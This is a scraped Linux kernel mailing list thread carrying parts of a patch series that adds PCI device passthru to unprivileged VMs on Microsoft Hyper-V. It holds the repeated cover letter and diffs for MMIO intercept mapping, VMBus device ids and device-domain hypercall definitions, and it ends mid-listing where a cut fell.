iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> Upon guest access, in case of missing mmio mapping, the hypervisor generates an unmapped gpa intercept. In this path, lookup the PCI resource pfn for the guest gpa, and ask the hypervisor to map it via hypercall. The PCI resource pfn is maintained by the VFIO driver, and obtained via fixup_user_fault call (similar to KVM). Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- drivers/hv/mshv_root_main.c | 115 ++++++++++++++++++++++++++++++++++++ 1 file changed, 115 insertions(+) diff --git a/drivers/hv/mshv_root_main.c b/drivers/hv/mshv_root_main.c index 03f3aa9f5541..4c8bc7cd0888 100644 --- a/drivers/hv/mshv_root_main.c +++ b/drivers/hv/mshv_root_main.c @@ -56,6 +56,14 @@ struct hv_stats_page { }; } __packed; +bool hv_nofull_mmio; /* don't map entire mmio region upon fault */ +static int __init setup_hv_full_mmio(char *str) +{ + hv_nofull_mmio = true; + return 0; +} +__setup("hv_nofull_mmio", setup_hv_full_mmio); + struct mshv_root mshv_root; enum hv_scheduler_type hv_scheduler_type; @@ -612,6 +620,109 @@ mshv_partition_region_by_gfn(struct mshv_partition *partition, u64 gfn) } #ifdef CONFIG_X86_64 + +/* + * Check if uaddr is for mmio range. If yes, return 0 with mmio_pfn filled in + * else just return -errno. + */ +static int mshv_chk_get_mmio_start_pfn(struct mshv_partition *pt, u64 gfn, + u64 *mmio_pfnp) +{ + struct vm_area_struct *vma; + bool is_mmio; + u64 uaddr; + struct mshv_mem_region *mreg; + struct follow_pfnmap_args pfnmap_args; + int rc = -EINVAL; + + /* + * Do not allow mem region to be deleted beneath us. VFIO uses + * useraddr vma to lookup pci bar pfn. + */ + spin_lock(&pt->pt_mem_regions_lock); + + /* Get the region again under the lock */ + mreg = mshv_partition_region_by_gfn(pt, gfn); + if (mreg == NULL || mreg->type != MSHV_REGION_TYPE_MMIO) + goto unlock_pt_out; + + uaddr = mreg->start_uaddr + + ((gfn - mreg->start_gfn) << HV_HYP_PAGE_SHIFT); + + mmap_read_lock(current->mm); + vma = vma_lookup(current->mm, uaddr); + is_mmio = vma ? !!(vma->vm_flags & (VM_IO | VM_PFNMAP)) : 0; + if (!is_mmio) + goto unlock_mmap_out; + + pfnmap_args.vma = vma; + pfnmap_args.address = uaddr; + + rc = follow_pfnmap_start(&pfnmap_args); + if (rc) { + rc = fixup_user_fault(current->mm, uaddr, FAULT_FLAG_WRITE, + NULL); + if (rc) + goto unlock_mmap_out; + + rc = follow_pfnmap_start(&pfnmap_args); + if (rc) + goto unlock_mmap_out; + } + + *mmio_pfnp = pfnmap_args.pfn; + follow_pfnmap_end(&pfnmap_args); + +unlock_mmap_out: + mmap_read_unlock(current->mm); +unlock_pt_out: + spin_unlock(&pt->pt_mem_regions_lock); + return rc; +} + +/* + * At present, the only unmapped gpa is mmio space. Verify if it's mmio + * and resolve if possible. + * Returns: True if valid mmio intercept and it was handled, else false + */ +static bool mshv_handle_unmapped_gpa(struct mshv_vp *vp) +{ + struct hv_message *hvmsg = vp->vp_intercept_msg_page; + struct hv_x64_memory_intercept_message *msg; + union hv_x64_memory_access_info accinfo; + u64 gfn, mmio_spa, numpgs; + struct mshv_mem_region *mreg; + int rc; + struct mshv_partition *pt = vp->vp_partition; + + msg = (struct hv_x64_memory_intercept_message *)hvmsg->u.payload; + accinfo = msg->memory_access_info; + + if (!accinfo.gva_gpa_valid) + return false; + + /* Do a fast check and bail if non mmio intercept */ + gfn = msg->guest_physical_address >> HV_HYP_PAGE_SHIFT; + mreg = mshv_partition_region_by_gfn(pt, gfn); + if (mreg == NULL || mreg->type != MSHV_REGION_TYPE_MMIO) + return false; + + rc = mshv_chk_get_mmio_start_pfn(pt, gfn, &mmio_spa); + if (rc) + return false; + + if (!hv_nofull_mmio) { /* default case */ + gfn = mreg->start_gfn; + mmio_spa = mmio_spa - (gfn - mreg->start_gfn); + numpgs = mreg->nr_pages; + } else + numpgs = 1; + + rc = hv_call_map_mmio_pages(pt->pt_id, gfn, mmio_spa, numpgs); + + return rc == 0; +} + static struct mshv_mem_region * mshv_partition_region_by_gfn_get(struct mshv_partition *p, u64 gfn) { @@ -666,13 +777,17 @@ static bool mshv_handle_gpa_intercept(struct mshv_vp *vp) return ret; } + #else /* CONFIG_X86_64 */ +static bool mshv_handle_unmapped_gpa(struct mshv_vp *vp) { return false; } static bool mshv_handle_gpa_intercept(struct mshv_vp *vp) { return false; } #endif /* CONFIG_X86_64 */ static bool mshv_vp_handle_intercept(struct mshv_vp *vp) { switch (vp->vp_intercept_msg_page->header.message_type) { + case HVMSG_UNMAPPED_GPA: + return mshv_handle_unmapped_gpa(vp); case HVMSG_GPA_INTERCEPT: return mshv_handle_gpa_intercept(vp); } -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:30 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> VFIO no longer puts the mmio pfn in vma->vm_pgoff. So, remove code that is using it to map mmio space. It is broken and will cause panic. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- drivers/hv/mshv_root_main.c | 20 ++++---------------- 1 file changed, 4 insertions(+), 16 deletions(-) diff --git a/drivers/hv/mshv_root_main.c b/drivers/hv/mshv_root_main.c index 27313419828d..03f3aa9f5541 100644 --- a/drivers/hv/mshv_root_main.c +++ b/drivers/hv/mshv_root_main.c @@ -1258,16 +1258,8 @@ static int mshv_prepare_pinned_region(struct mshv_mem_region *region) } /* - * This maps two things: guest RAM and for pci passthru mmio space. - * - * mmio: - * - vfio overloads vm_pgoff to store the mmio start pfn/spa. - * - Two things need to happen for mapping mmio range: - * 1. mapped in the uaddr so VMM can access it. - * 2. mapped in the hwpt (gfn <-> mmio phys addr) so guest can access it. - * - * This function takes care of the second. The first one is managed by vfio, - * and hence is taken care of via vfio_pci_mmap_fault(). + * This is called for both user ram and mmio space. The mmio space is not + * mapped here, but later during intercept. */ static long mshv_map_user_memory(struct mshv_partition *partition, @@ -1276,7 +1268,6 @@ mshv_map_user_memory(struct mshv_partition *partition, struct mshv_mem_region *region; struct vm_area_struct *vma; bool is_mmio; - ulong mmio_pfn; long ret; if (mem.flags & BIT(MSHV_SET_MEM_BIT_UNMAP) || @@ -1286,7 +1277,6 @@ mshv_map_user_memory(struct mshv_partition *partition, mmap_read_lock(current->mm); vma = vma_lookup(current->mm, mem.userspace_addr); is_mmio = vma ? !!(vma->vm_flags & (VM_IO | VM_PFNMAP)) : 0; - mmio_pfn = is_mmio ? vma->vm_pgoff : 0; mmap_read_unlock(current->mm); if (!vma) @@ -1313,10 +1303,8 @@ mshv_map_user_memory(struct mshv_partition *partition, HV_MAP_GPA_NO_ACCESS, NULL); break; case MSHV_REGION_TYPE_MMIO: - ret = hv_call_map_mmio_pages(partition->pt_id, - region->start_gfn, - mmio_pfn, - region->nr_pages); + /* mmio mappings are handled later during intercepts */ + ret = 0; break; } -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:29 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> Import/copy from Hyper-V public headers, definitions and declarations that are related to attaching and detaching of device domains and interrupt remapping, and building device ids for those purposes. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- include/hyperv/hvgdk_mini.h | 11 ++++ include/hyperv/hvhdk_mini.h | 112 ++++++++++++++++++++++++++++++++++++ 2 files changed, 123 insertions(+) diff --git a/include/hyperv/hvgdk_mini.h b/include/hyperv/hvgdk_mini.h index 04b18d0e37af..bda9fae5b1ef 100644 --- a/include/hyperv/hvgdk_mini.h +++ b/include/hyperv/hvgdk_mini.h @@ -323,6 +323,9 @@ union hv_hypervisor_version_info { /* stimer Direct Mode is available */ #define HV_STIMER_DIRECT_MODE_AVAILABLE BIT(19) +#define HV_DEVICE_DOMAIN_AVAILABLE BIT(24) +#define HV_S1_DEVICE_DOMAIN_AVAILABLE BIT(25) + /* * Implementation recommendations. Indicates which behaviors the hypervisor * recommends the OS implement for optimal performance. @@ -471,6 +474,8 @@ union hv_vp_assist_msr_contents { /* HV_REGISTER_VP_ASSIST_PAGE */ #define HVCALL_MAP_DEVICE_INTERRUPT 0x007c #define HVCALL_UNMAP_DEVICE_INTERRUPT 0x007d #define HVCALL_RETARGET_INTERRUPT 0x007e +#define HVCALL_ATTACH_DEVICE 0x0082 +#define HVCALL_DETACH_DEVICE 0x0083 #define HVCALL_NOTIFY_PARTITION_EVENT 0x0087 #define HVCALL_ENTER_SLEEP_STATE 0x0084 #define HVCALL_NOTIFY_PORT_RING_EMPTY 0x008b @@ -482,9 +487,15 @@ union hv_vp_assist_msr_contents { /* HV_REGISTER_VP_ASSIST_PAGE */ #define HVCALL_GET_VP_INDEX_FROM_APIC_ID 0x009a #define HVCALL_FLUSH_GUEST_PHYSICAL_ADDRESS_SPACE 0x00af #define HVCALL_FLUSH_GUEST_PHYSICAL_ADDRESS_LIST 0x00b0 +#define HVCALL_CREATE_DEVICE_DOMAIN 0x00b1 +#define HVCALL_ATTACH_DEVICE_DOMAIN 0x00b2 +#define HVCALL_MAP_DEVICE_GPA_PAGES 0x00b3 +#define HVCALL_UNMAP_DEVICE_GPA_PAGES 0x00b4 #define HVCALL_SIGNAL_EVENT_DIRECT 0x00c0 #define HVCALL_POST_MESSAGE_DIRECT 0x00c1 #define HVCALL_DISPATCH_VP 0x00c2 +#define HVCALL_DETACH_DEVICE_DOMAIN 0x00c4 +#define HVCALL_DELETE_DEVICE_DOMAIN 0x00c5 #define HVCALL_GET_GPA_PAGES_ACCESS_STATES 0x00c9 #define HVCALL_ACQUIRE_SPARSE_SPA_PAGE_HOST_ACCESS 0x00d7 #define HVCALL_RELEASE_SPARSE_SPA_PAGE_HOST_ACCESS 0x00d8 diff --git a/include/hyperv/hvhdk_mini.h b/include/hyperv/hvhdk_mini.h index 41a29bf8ec14..57821d6ddb61 100644 --- a/include/hyperv/hvhdk_mini.h +++ b/include/hyperv/hvhdk_mini.h @@ -449,6 +449,32 @@ struct hv_send_ipi_ex { /* HV_INPUT_SEND_SYNTHETIC_CLUSTER_IPI_EX */ struct hv_vpset vp_set; } __packed; +union hv_attdev_flags { /* HV_ATTACH_DEVICE_FLAGS */ + struct { + u32 logical_id : 1; + u32 resvd0 : 1; + u32 ats_enabled : 1; + u32 virt_func : 1; + u32 shared_irq_child : 1; + u32 virt_dev : 1; + u32 ats_supported : 1; + u32 small_irt : 1; + u32 resvd : 24; + } __packed; + u32 as_uint32; +}; + +union hv_dev_pci_caps { /* HV_DEVICE_PCI_CAPABILITIES */ + struct { + u32 max_pasid_width : 5; + u32 invalidate_qdepth : 5; + u32 global_inval : 1; + u32 prg_response_req : 1; + u32 resvd : 20; + } __packed; + u32 as_uint32; +}; + typedef u16 hv_pci_rid; /* HV_PCI_RID */ typedef u16 hv_pci_segment; /* HV_PCI_SEGMENT */ typedef u64 hv_logical_device_id; @@ -528,4 +554,90 @@ union hv_device_id { /* HV_DEVICE_ID */ } acpi; } __packed; +struct hv_input_attach_device { /* HV_INPUT_ATTACH_DEVICE */ + u64 partition_id; + union hv_device_id device_id; + union hv_attdev_flags attdev_flags; + u8 attdev_vtl; + u8 rsvd0; + u16 rsvd1; + u64 logical_devid; + union hv_dev_pci_caps dev_pcicaps; + u16 pf_pci_rid; + u16 resvd2; +} __packed; + +struct hv_input_detach_device { /* HV_INPUT_DETACH_DEVICE */ + u64 partition_id; + u64 logical_devid; +} __packed; + + +/* 3 domain types: stage 1, stage 2, and SOC */ +#define HV_DEVICE_DOMAIN_TYPE_S2 0 /* HV_DEVICE_DOMAIN_ID_TYPE_S2 */ +#define HV_DEVICE_DOMAIN_TYPE_S1 1 /* HV_DEVICE_DOMAIN_ID_TYPE_S1 */ +#define HV_DEVICE_DOMAIN_TYPE_SOC 2 /* HV_DEVICE_DOMAIN_ID_TYPE_SOC */ + +/* ID for stage 2 default domain and NULL domain */ +#define HV_DEVICE_DOMAIN_ID_S2_DEFAULT 0 +#define HV_DEVICE_DOMAIN_ID_S2_NULL 0xFFFFFFFFULL + +union hv_device_domain_id { + u64 as_uint64; + struct { + u32 type : 4; + u32 reserved : 28; + u32 id; + }; +} __packed; + +struct hv_input_device_domain { /* HV_INPUT_DEVICE_DOMAIN */ + u64 partition_id; + union hv_input_vtl owner_vtl; + u8 padding[7]; + union hv_device_domain_id domain_id; +} __packed; + +union hv_create_device_domain_flags { /* HV_CREATE_DEVICE_DOMAIN_FLAGS */ + u32 as_uint32; + struct { + u32 forward_progress_required : 1; + u32 inherit_owning_vtl : 1; + u32 reserved : 30; + } __packed; +} __packed; + +struct hv_input_create_device_domain { /* HV_INPUT_CREATE_DEVICE_DOMAIN */ + struct hv_input_device_domain device_domain; + union hv_create_device_domain_flags create_device_domain_flags; +} __packed; + +struct hv_input_delete_device_domain { /* HV_INPUT_DELETE_DEVICE_DOMAIN */ + struct hv_input_device_domain device_domain; +} __packed; + +struct hv_input_attach_device_domain { /* HV_INPUT_ATTACH_DEVICE_DOMAIN */ + struct hv_input_device_domain device_domain; + union hv_device_id device_id; +} __packed; + +struct hv_input_detach_device_domain { /* HV_INPUT_DETACH_DEVICE_DOMAIN */ + u64 partition_id; + union hv_device_id device_id; +} __packed; + +struct hv_input_map_device_gpa_pages { /* HV_INPUT_MAP_DEVICE_GPA_PAGES */ + struct hv_input_device_domain device_domain; + union hv_input_vtl target_vtl; + u8 padding[3]; + u32 map_flags; + u64 target_device_va_base; + u64 gpa_page_list[]; +} __packed; + +struct hv_input_unmap_device_gpa_pages { /* HV_INPUT_UNMAP_DEVICE_GPA_PAGES */ + struct hv_input_device_domain device_domain; + u64 target_device_va_base; +} __packed; + #endif /* _HV_HVHDK_MINI_H */ -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:24 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
From: Mukesh Rathor <mrathor@linux.microsoft.com> On Hyper-V, most hypercalls related to PCI passthru to map/unmap regions, interrupts, etc need a device id as a parameter. This device id refers to that specific device during the lifetime of passthru. An L1VH VM only contains VMBus based devices. A device id for a VMBus device is slightly different in that it uses the hv_pcibus_device info for building it to make sure it matches exactly what the hypervisor expects. This VMBus based device id is needed when attaching devices in an L1VH based guest VM. Before building it, a check is done to make sure the device is a valid VMBus device. Signed-off-by: Mukesh Rathor <mrathor@linux.microsoft.com> --- arch/x86/include/asm/mshyperv.h | 2 ++ drivers/pci/controller/pci-hyperv.c | 29 +++++++++++++++++++++++++++++ 2 files changed, 31 insertions(+) diff --git a/arch/x86/include/asm/mshyperv.h b/arch/x86/include/asm/mshyperv.h index eef4c3a5ba28..0d7fdfb25e76 100644 --- a/arch/x86/include/asm/mshyperv.h +++ b/arch/x86/include/asm/mshyperv.h @@ -188,6 +188,8 @@ bool hv_vcpu_is_preempted(int vcpu); static inline void hv_apic_init(void) {} #endif +u64 hv_pci_vmbus_device_id(struct pci_dev *pdev); + struct irq_domain *hv_create_pci_msi_domain(void); int hv_map_msi_interrupt(struct irq_data *data, diff --git a/drivers/pci/controller/pci-hyperv.c b/drivers/pci/controller/pci-hyperv.c index 8bc6a38c9b5a..40f0b06bb966 100644 --- a/drivers/pci/controller/pci-hyperv.c +++ b/drivers/pci/controller/pci-hyperv.c @@ -579,6 +579,8 @@ static void hv_pci_onchannelcallback(void *context); #define DELIVERY_MODE APIC_DELIVERY_MODE_FIXED #define HV_MSI_CHIP_FLAGS MSI_CHIP_FLAG_SET_ACK +static bool hv_vmbus_pci_device(struct pci_bus *pbus); + static int hv_pci_irqchip_init(void) { return 0; @@ -598,6 +600,26 @@ static unsigned int hv_msi_get_int_vector(struct irq_data *data) #define hv_msi_prepare pci_msi_prepare +u64 hv_pci_vmbus_device_id(struct pci_dev *pdev) +{ + u64 u64val; + struct hv_pcibus_device *hbus; + struct pci_bus *pbus = pdev->bus; + + if (!hv_vmbus_pci_device(pbus)) + return 0; + + hbus = container_of(pbus->sysdata, struct hv_pcibus_device, sysdata); + u64val = (hbus->hdev->dev_instance.b[5] << 24) | + (hbus->hdev->dev_instance.b[4] << 16) | + (hbus->hdev->dev_instance.b[7] << 8) | + (hbus->hdev->dev_instance.b[6] & 0xf8) | + PCI_FUNC(pdev->devfn); + + return u64val; +} +EXPORT_SYMBOL_GPL(hv_pci_vmbus_device_id); + /** * hv_irq_retarget_interrupt() - "Unmask" the IRQ by setting its current * affinity. @@ -1404,6 +1426,13 @@ static struct pci_ops hv_pcifront_ops = { .write = hv_pcifront_write_config, }; +#ifdef CONFIG_X86 +static bool hv_vmbus_pci_device(struct pci_bus *pbus) +{ + return pbus->ops == &hv_pcifront_ops; +} +#endif /* CONFIG_X86 */ + /* * Paravirtual backchannel * -- 2.51.2.vfs.0.1
{ "author": "Mukesh R <mrathor@linux.microsoft.com>", "date": "Mon, 19 Jan 2026 22:42:25 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 